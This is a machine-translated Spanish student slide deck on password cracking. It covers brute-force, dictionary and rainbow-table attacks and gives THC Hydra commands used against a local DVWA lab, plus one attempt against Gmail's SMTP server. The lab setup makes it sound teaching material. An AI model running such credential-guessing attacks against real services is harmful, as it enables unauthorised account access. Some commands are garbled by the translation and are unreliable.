Passwords es

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 58

Suscríbete a DeepL Pro para poder traducir archivos de mayor tamaño.

Más información disponible en www.DeepL.com/pro.

BALLERIO SIMONE
GALASSO EMANUELE

PROYECTO DE CIBERSEGURIDAD
PASSWORDCRACKING
Resumen
Descifrado de contraseñas

Experimentos Thc hydra

2
Funciones de descifrado de contraseñas
¿Qué es el cracking de contraseñas?

Ataque en línea Ataque fuera de línea

Ataque de diccionario Fuerza bruta

Raibowtable Técnicas híbridas


3
¿Qué es el cracking de contraseñas?

El descifrado de contraseñas es el proceso de intentar obtener


acceso no autorizado a sistemas restringidos utilizando
contraseñas comunes o algoritmos que adivinan
contraseñas.
4
¿Cómo se guarda una contraseña?

Contrase Contraseña codificada


ña HASHFUNCTION

5
Cracking online VS offline

Pruebe un gran número de Intenta obtener el hash de la


combinaciones de nombre de usuario y contraseña en situación offline y
contraseña en el portal de acceso. luego crackealos intentando
encontrar el valor en texto claro
que computa ese hash.

limitada por la velocidad de la red Limitado por la velocidad de la máquina del


hacker
6
Ataque de fuerza bruta
Prueba todas las combinaciones posibles de caracteres.

Depende únicamente de la longitud de la contraseña y del sistema utilizado

Estamos seguros al 100% de encontrar la contraseña, pero no sabemos cuánto durará el


proceso.
7
EjemploFuerza Bruta
PROBLEMA
Consideremos por un momento que nos encontramos en un entorno en el que todas las
potencias de los sistemas son iguales entresí, y que debemos encontrar una contraseña
compuesta únicamente por 8 caracteres alfanuméricos.
¿Cuántos intentos tendremos que hacer en el peor de los casos?

Consideración
Los caracteres alfanuméricos son: a...z, A...Z, 0...9 = 64
posibilidades. Ya conocemos el nombre de usuario.
La solución depende únicamente de la longitud de la contraseña.
Conocer la longitud exacta de la contraseña siempre simplifica el trabajo.
8
EjemploFuerza Bruta
SOLUCIÓN

648 combinaciones posibles (Disposición con ripetición 𝐷r𝑛𝑘 = 𝑛 )𝑘

9
Ataque al diccionario
Pruebe todas las cuerdas de un listado preestablecido.

Depende de la complejidad de la contraseña y de que no tenga un significado corriente.

Hay menos posibilidades de llegar a una solución, pero si llegamos es en un tiempo


relativamente rápido.
10
EjemploDiccionario Ataque

PROBLEMA
Consideremos un ataque de diccionario con el diccionario francés, donde hay
aproximadamente 135.000
palabras.

Solución
Podemos encontrar una contraseña francesa común intentándolo 135.000 veces.
.
11
RainbowtableAttack

Se trata de un diccionario precalculado de


contraseñas en texto plano y su
correspondiente valor hash.

Más de un texto puede producir el mismo hash, no


es importante saber cuál era realmente la
contraseña original.

El salado de contraseñas es un método común


para prevenir los ataques rainbowtable.
12
Salado de contraseñas
MISMA CONTRASEÑA=MISMO HASH
BOB ALMACENADO ALICE

13
Ataque híbrido

Diccionario híbrido

Conocimientos previos Diccionario

Maximice sus posibilidades de éxito

14
Experimentos

15
Herramientas
Kali Linux es una
distribución
avanzada para
pruebas de
penetración

Hydra es un
cracker de inicio
de sesión
paralelizado

Maldita aplicación
web vulnerable
16
Kali Linux
Kali contiene varios cientos de herramientas orientadas a diversas tareas
de seguridad de la información, como:

Pruebas de Informática forense


penetración Ingeniería inversa
Investigación sobre
seguridad

Kali Linux está desarrollado, financiado y mantenido por Offensive Security,


una empresa líder en formación sobre seguridad de la información.
17
Hydra

• Es muy rápido y flexible

• Los nuevos módulos son fáciles de añadir

• Demuestre lo fácil que sería obtener autorización


acceso remoto a un sistema

18
DVWA (Aplicación Web Vulnerable)
Los hackers éticos ponen a prueba sus habilidades y utilizan herramientas en un entorno
legal.

• Para principiantes y usuarios avanzados, DVWA es la mejor plataforma.

• Este es el mejor lugar para piratear.

• Ayuda a los desarrolladores web a comprender mejor los procesos de seguridad de la web
aplicaciones
19
Idea de experimentos

En los experimentos actuales, se propone un descifrado de contraseñas


relacionado con el descubrimiento del par [usuario-contraseña] relativo a
las credenciales de acceso ubicadas dentro del programa de software
especial DVWA.
20
Fuerza bruta

hydra -Luser.txt -x 1:5:a -F-w10 -V127.0.0.1


http -get -
form"/DVWA/vulnerabilities/b
rute/
:username =^USER^& password =^PASS^&Login=Inicio de sesión
:S=Bienvenido a la zona protegida por contraseña
:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk
21
Fuerza bruta

hydra- -x -F-w10 -V127.0.0.1


Luser.t 1:5:a
http -get -
xt =^USER^& password
form"/DVWA/vulnerabilities/
:username
=^PASS^&Login=Inicio deprotegida
:S=Bienvenido a labrute/
zona sesión por contraseña
:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk

22
Fuerza bruta

En este caso no es posible mostrar la solución porque las


combinaciones de contraseñas son muy altas y por lo tanto llevaría
mucho tiempo.
23
Ataque al diccionario

hydra-l admin - -e ns -F-u -w10 -v-V 127.0.0.1


Prockyou.
http -get -form"/DVWA/vulnerabilities/brute/
txt
:username =^USER^& password =^PASS^&Login=Inicio de sesión
:S=Bienvenido a la zona protegida por contraseña
:H=Cookie :seguridad=b PHPSESSID=hsn2d01480glgm9m2svtv9jkls"
aja;

24
Ataque al diccionario

hydra -l admin -Prockyou.txt -e ns -F-u -w10 -v-V 127.0.0.1


http -get -
form"/DVWA/vulnerabilities/brute/
:username =^USER^& password =^PASS^&Login=Inicio de sesión
:S=Bienvenido a la zona protegida por contraseña
:H=Cookie :security=medio; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"
25
Ataque al diccionario

• Bajo: Este nivel de seguridad es completamente vulnerable y no


tiene ningunamedida de seguridad.

• Medio: Esta configuración es principalmente para dar un ejemplo al usuario de


malas prácticas de seguridad, cuando el desarrollador ha
intentado proteger una aplicaciónpero no lo ha conseguido.

26
Ataque al diccionario

27
Ataque Smtp

hydrasmtp.gmail.com-l -Ptemp -s 465 -S-V- smtp


test2.20192020@gmail.com f

28
Otros posibles experimentos

THC-Hydra ofrece muchos servicios diferentes:

• Afp • Cabecera • Ncp


• Cisco Https • Nntp
• Cvs • Https-form-get • Oracle-listener
• Firebird • Https-form-post • Pcanywhere
• Ftp • Imap • Pop3
• Http-get • Smb • Postgres
• Cabecera • Ldap2 • Rexecsnmp
http • Ldap3 • Smtp
• Http-proxy • Mssql • Telnet
• Https- • Mysql
get
29
CONCLUSIÓN
• Utilice contraseñas largas, de al menos 15 caracteres.

• No utilice la misma contraseña para los privilegiados


cuentas de usuario entre sistemas.

• No lo compartas.

30
Gracias por la atención

31
Cómo probar
Caja virtual: https://www.virtualbox.org/wiki/Downloads

Kali linux : https://linoxide.com/distros/learn-method-


install- kali-linux-virtualbox/
DVWAinstallation:
https://medium.com/datadriveninvestor/setup-install-dvwa-
en-su-distribucion-linux-d76dc3b80357

Si tiene algún problema durante la instalación, póngase en contacto con nosotros.


.vdi de la máquina virtual con todas las instalaciones que necesite.
32
Cómo probar

33
Cómo probar

Nombre de usuario: root

Contraseña: toor

34
Cómo probar

35
Cómo probar

1. service apache2 start


2. service mysql start

36
Cómo probar
http://127.0.0.1/DVWA/login.php

Nombre de usuario: admin


Contraseña: password

37
Cómo probar
3

38
Cómo probar
AHORA ESTÁS EN LA IMAGEN:

39
Cómo probar
Haz clic con el
botón
derecho:
1

2(Selecc
ionar) 3
40
Cómo probar
Pruébalo y Pura fuerza bruta:
diviértete: hydra -Luser.txt -x 1:5:a -e ns -F -u -w10 -v -V 127.0.0.1 http-get-form
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=
Bienvenido a la zona protegida por contraseña:H=Cookie\: security=medium;
PHPSESSID=INSERTPHPSESSID"

Ataque de diccionario:
hydra -l admin-Prockyou.txt -F -V 127.0.0.1 http-get-form
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=
Bienvenido a la zona protegida por contraseña:H=Cookie\: security=medium;
PHPSESSID=INSERTPHPSESSID"

Pruebe: hydra -h, para másinformación


¡DISFRUTA!
42

También podría gustarte